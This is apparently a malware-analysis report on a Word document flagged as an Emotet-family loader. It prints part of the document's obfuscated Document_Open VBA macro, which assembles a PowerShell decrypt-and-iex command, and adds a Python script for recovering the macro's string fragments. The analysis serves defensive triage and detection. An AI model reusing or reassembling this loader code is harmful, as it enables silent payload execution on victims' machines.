Verdict: MALICIOUS (risk score 184)
Malware Insights

MITRE ATT&CK:
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample contains a VBA macro that runs from the Document_Open event, i.e. it executes as soon as the document is opened with macros enabled. The heuristics flag a Shell() call in the VBA (an attempt to execute an external command), and in the visible part of the decoded macro the entry point calls Application.Run with both the procedure name and its argument assembled at run time by string concatenation. The helper function NbzqJQcHQCOr builds that argument from fragments returned by JhbaId(); the plaintext fragments contain PowerShell syntax (ConvertTo-SecureString with a -Key byte array, member access on [Runtime.InteropServices.Marshal], and $ShellId[1]+$ShellId[13]+'X', which evaluates to iex because $ShellId is "Microsoft.PowerShell"), while the remaining fragments are base64 text. The repeated assignments of CDbl/Sgn/CStr constants, the references to never-assigned variables, and the "v - v + N + v - v" argument expressions are padding that has no effect under On Error Resume Next. The ClamAV detection name Doc.Malware.Emodldr-10025032-0 and the 42 KB macros.bas carved from the document support the verdict that this document is a loader that downloads and runs a secondary payload.
Heuristics (6)

- ClamAV: Doc.Malware.Emodldr-10025032-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
- VBA macros detected (medium, OLE_VBA_MACROS, 2 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE): One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - URL http://schemas.openxmlformats.org/drawingml/2006/main, found in document text (OLE body). This is the standard DrawingML XML namespace URI present in any Office document that contains drawing markup; it is not an indicator of compromise and should not be blocked or hunted for.
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size | SHA-256 | Detection |
|---|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 42005 bytes | 41ac244dd57d7f96fdfed2c44c5b4ed8f5f283344c38c88c239d442d74c87f51 | ClamAV: no threats found. Obfuscation or payload: likely (carved artifact contains 20 long base64-like blobs). |

The ClamAV result on macros.bas applies to the decoded VBA source alone; the Emodldr signature fired on the parent document, so the two results do not contradict each other.
Preview script: first 1,000 lines of the extracted script (listing truncated below)
Attribute VB_Name = "kaioCOP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
qvOOMi = CDbl(66379)
jcSDj = Sgn(65077)
oKfUnD = wVJzRU
wVfYD = 89320
oqsGr = CStr(53614)
ZwLWn = JLiiB
Application.Run DwsENM + "WAhTpzszhfMHI" + fkGmf, nYAUmO + NbzqJQcHQCOr + bjYZwd
zMmrBX = CDbl(22616)
awlfud = Sgn(93065)
TJjqA = JrrPFQ
YTGji = 28552
wPlIU = CStr(93582)
DiHURi = FQRnd
End Sub
Attribute VB_Name = "DvzlRvT"
Sub dfvMO(WEXYVD)
FJkvnl = CDbl(21484)
CowEM = Sgn(29254)
PzqYc = aDLIDB
AstRZC = 95326
PqdJIj = CStr(50915)
zHBOTo = hwaEf
End Sub
Function NbzqJQcHQCOr()
On Error Resume Next
zoANLk = CDbl(71014)
InNKKK = Sgn(5961)
qoSAXE = XibYd
IWQnF = 69179
UpXLG = CStr(75405)
dFpwzH = rtbqb
UOfMTUBSUat = JhbaId("nDEANwA0AGMAMQBiADgAMQA4ADQANQBmADQAYQA3AGYANwAyADQAYQBPTK8Y", uRKUOC - uRKUOC + 2 + uRKUOC - uRKUOC, uRKUOC - uRKUOC + 54 + uRKUOC - uRKUOC)
cdijMH = CDbl(42939)
QwWFau = Sgn(48405)
QHukP = RpfbVF
dozdo = 61709
HozwQp = CStr(24988)
SrWMn = cUwqft
dYTLL = CDbl(55207)
HBQDQ = Sgn(56385)
Uhjzzo = UaHVE
HSPCl = 51989
rrMRnf = CStr(69700)
WYZLYj = MBUVH
hnwiiSbqov = JhbaId("XzZgA0ADEANwBkAGYAOABmAGUA'| .('C'+'oNvERTT'+'O'+'-s'+'ecuREs'+'TrInG') -KE 65,40,85,29,16,99,251,204,243,35,129,78,92,129,147,189)) ) )|&( $sHelLId[1]+$SHElLid[13]+'X')3mr7", sElmR - sElmR + 3 + sElmR - sElmR, sElmR - sElmR + 169 + sElmR - sElmR)
JwLpHI = CDbl(89118)
mNRojC = Sgn(55716)
RMSEf = BiKjki
NhPTw = 65614
AbjXpr = CStr(69886)
IWphv = jIDDQL
bplzDb = CDbl(12850)
pTETc = Sgn(10449)
RYRvBP = bzAME
wujFwj = 93793
IIlivZ = CStr(98711)
qITisj = CqkZFN
pkmNhE = JhbaId(",WZBkADEANgBmADkANwAyADgAZAA4AGMAMgA5ADcAMgBjAGUAOQBmAGQANABkAGMANQBiADQAOABmADAAZQA5AGQANwAyADkANgAzADkANgA3ADgAZQA3ADUANgBlADgANgA3AGYAMwA1ADYAOQAwAGQAMAAzADIAOABmADQANGtY", dfbYLj - dfbYLj + 4 + dfbYLj - dfbYLj, dfbYLj - dfbYLj + 167 + dfbYLj - dfbYLj)
zrWLbv = CDbl(69342)
VwIHJQ = Sgn(60214)
FqWzI = saCNHh
NHrRW = 21585
IkzDsr = CStr(74551)
WlaWW = fiiOd
VzSYbX = CDbl(67828)
vjGTUk = Sgn(14912)
wSETu = tSzSR
MrEYqr = 43440
kTPCfR = CStr(83050)
sVbIB = SpWTEL
nXffCRtu = JhbaId("7h( [rUNtiME.INTerOpSerVIces.MArPLrX", wvIOo - wvIOo + 3 + wvIOo - wvIOo, wvIOo - wvIOo + 30 + wvIOo - wvIOo)
AaIGC = CDbl(60649)
bhddN = Sgn(60203)
iCCndS = acqIfV
PCWmK = 43305
sHvdln = CStr(71714)
rwvVQ = nTfbtZ
zjUwfk = CDbl(68475)
WcCRz = Sgn(64923)
LuWQo = WdHBtK
DSSsIZ = 27303
RQZIAa = CStr(85819)
iujJs = IuFhCc
HDlAAKEM = JhbaId("LOSHaL]::([rUNtIme.INtErOpseRvIcES.mARshaL].GeTMeMBers()[2].naME).INvOKE([rUntiME.InTERopSEsEFH", zSwWKi - zSwWKi + 3 + zSwWKi - zSwWKi, zSwWKi - zSwWKi + 89 + zSwWKi - zSwWKi)
Nvmaz = CDbl(36341)
JJJaT = Sgn(44537)
iwHnIi = YHMBtF
YmaWm = 71115
UniDH = CStr(78354)
ZkGpVD = wwuuzf
qpLkQ = CDbl(42353)
fHYNuv = Sgn(40247)
fzTAbO = kqvHa
NatwPK = 78333
DYSfq = CStr(26227)
DPAVP = PXcTc
YNARrTv = JhbaId("KuJfGUA2vSvG", oZZDNu - oZZDNu + 5 + oZZDNu - oZZDNu, oZZDNu - oZZDNu + 3 + oZZDNu - oZZDNu)
nEUpIv = CDbl(95835)
jfPik = Sgn(61914)
caBUk = chaum
NwCQf = 75425
ARjiK = CStr(69123)
vtXAVk = Mnzawr
XjQAGT = CDbl(93779)
OiWTV = Sgn(78570)
SslNh = ORrBjb
CHMJY = 76871
zsWRjw = CStr(55750)
RjkhzK = bOwOo
cDuoh = JhbaId("KqME0ADEAZQA4ADcAMgBiADQAMAA3ADgAZAA2AGMAMwBkADkAZAA3ADEAMwBiADUAZAA1ADAAWBiGq", KWtuVl - KWtuVl + 5 + KWtuVl - KWtuVl, KWtuVl - KWtuVl + 69 + KWtuVl - KWtuVl)
RZzZr = CDbl(63730)
HWMuhC = Sgn(48534)
VUdiO = AKQziF
fzNKzd = 65640
XrsRd = CStr(35333)
UqAulm = uTfZU
fNZYO = CDbl(74182)
PlLFf = Sgn(64840)
BhQkCS = MGUdB
coYRb = 11163
wPifph = CStr(83789)
VEUWaX = tzvhB
KOiYXm = JhbaId("jqAZgBlADQAOAAxADUAZgBiAGIAZQBkAGQANgAwAGYANwBhADQAOABjAGIAMgBhADQAYgAyAGYAZQAwAGIAMgA4AGUANAAyADIANABhADUAYQA5ADgAYwBjADMANAA0ADYAMgBkAGYANwBkAGEAMgBiAGQAOQBjADkAMwBkADkAMQA0AGMAiiq%DR", OiaNb - OiaNb + 3 + OiaNb - OiaNb, O
... (truncated)
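As an added illustration, not part of the analyzer's report or of the sample's own code, the following Python script recovers the string fragments produced by JhbaId() calls like those in the preview above. It assumes JhbaId() behaves like VBA Mid(s, start, length) with a 1-based start; that is an inference from the visible arguments (start 2 and length 54 carve exactly the base64-looking core out of the first literal, and two adjacent fragments join as "MAr" + "SHaL]"), since the page does not show the function body. The sample input is three calls copied from the preview. The script folds the "v - v + N + v - v" padding to N, applies Mid, tries the four base64 alignments of each base64-looking fragment looking for a UTF-16LE hex-digit decoding, and resolves the $ShellId index trick. It deliberately does not reassemble the final command: the order in which the caller concatenates the fragments is not visible in the preview.

```python
import base64
import re

# Constructed sample input: three JhbaId() calls copied verbatim from the macros.bas preview.
# JhbaId() is ASSUMED to behave like VBA Mid(s, start, length) (1-based start); the page does
# not show its body, the assumption rests on the visible arguments lining up with the literals.
SAMPLE_VBA = r'''
UOfMTUBSUat = JhbaId("nDEANwA0AGMAMQBiADgAMQA4ADQANQBmADQAYQA3AGYANwAyADQAYQBPTK8Y", uRKUOC - uRKUOC + 2 + uRKUOC - uRKUOC, uRKUOC - uRKUOC + 54 + uRKUOC - uRKUOC)
hnwiiSbqov = JhbaId("XzZgA0ADEANwBkAGYAOABmAGUA'| .('C'+'oNvERTT'+'O'+'-s'+'ecuREs'+'TrInG') -KE 65,40,85,29,16,99,251,204,243,35,129,78,92,129,147,189)) ) )|&( $sHelLId[1]+$SHElLid[13]+'X')3mr7", sElmR - sElmR + 3 + sElmR - sElmR, sElmR - sElmR + 169 + sElmR - sElmR)
nXffCRtu = JhbaId("7h( [rUNtiME.INTerOpSerVIces.MArPLrX", wvIOo - wvIOo + 3 + wvIOo - wvIOo, wvIOo - wvIOo + 30 + wvIOo - wvIOo)
'''

# JhbaId("<literal>", <start expr>, <length expr>); the literal never contains a double quote here.
CALL_RE = re.compile(r'JhbaId\("([^"]*)"\s*,\s*([^,]+?)\s*,\s*([^)]+?)\s*\)')
TERM_RE = re.compile(r'([+-]?)\s*([A-Za-z_]\w*|\d+)')
HEX_DIGITS = set("0123456789abcdefABCDEF")
PS_SHELLID = "Microsoft.PowerShell"  # value of PowerShell's $ShellId automatic variable


def eval_padding_arith(expr):
    """Fold 'v - v + N + v - v' padding: every identifier must cancel out, numbers are summed."""
    total, balance = 0, {}
    for sign, tok in TERM_RE.findall(expr):
        s = -1 if sign == "-" else 1
        if tok.isdigit():
            total += s * int(tok)
        else:
            balance[tok] = balance.get(tok, 0) + s
    if any(balance.values()):
        raise ValueError("expression depends on a runtime variable: %s" % expr)
    return total


def vba_mid(s, start, length):
    """VBA Mid(): 1-based start, at most `length` characters."""
    return s[start - 1:start - 1 + length]


def recover_fragments(vba_source):
    """Return the substring each JhbaId() call yields, in source order."""
    return [vba_mid(lit, eval_padding_arith(start), eval_padding_arith(length))
            for lit, start, length in CALL_RE.findall(vba_source)]


def decode_utf16_hex(fragment):
    """A fragment cut out of a longer base64 stream is rarely quad-aligned, so try all four
    shifts; return (shift, text) for the one whose bytes are UTF-16LE hex digits (the format
    ConvertFrom-SecureString emits and the visible ConvertTo-SecureString -Key consumes)."""
    if not re.fullmatch(r"[A-Za-z0-9+/]+", fragment):
        return None
    for shift in range(4):
        chunk = fragment[shift:]
        chunk = chunk[: len(chunk) // 4 * 4]          # drop the unaligned tail
        if not chunk:
            continue
        raw = base64.b64decode(chunk)
        raw = raw[: len(raw) // 2 * 2]                # UTF-16 needs an even byte count
        text = raw.decode("utf-16-le", errors="replace")
        if text and all(c in HEX_DIGITS for c in text):
            return shift, text
    return None


def resolve_shellid_expr(expr):
    """Resolve  $ShellId[i]+$ShellId[j]+'X'  into the cmdlet alias it spells."""
    out = []
    for part in expr.split("+"):
        part = part.strip()
        m = re.fullmatch(r"\$shellid\[(\d+)\]", part, re.IGNORECASE)
        if m:
            out.append(PS_SHELLID[int(m.group(1))])
        elif part.startswith("'") and part.endswith("'"):
            out.append(part[1:-1])
    return "".join(out).lower()


if __name__ == "__main__":
    for i, frag in enumerate(recover_fragments(SAMPLE_VBA)):
        print(i, repr(frag[:60]), decode_utf16_hex(frag))
    print(resolve_shellid_expr("$sHelLId[1]+$SHElLid[13]+'X'"))
```

For the first fragment the script reports shift 3 and the text 74c1b81845f4a7f724: hex digits in UTF-16LE are what ConvertFrom-SecureString emits and what the ConvertTo-SecureString -Key call seen in the plaintext fragment consumes, so the base64 blobs are most likely the key-encrypted command that the Marshal call converts back to a string before iex executes it. When triaging a similar document, run the real olevba output through a recovery like this one rather than decoding individual blobs by hand, and treat any fragment whose arithmetic does not fold to a constant as a sign that the real value is computed elsewhere.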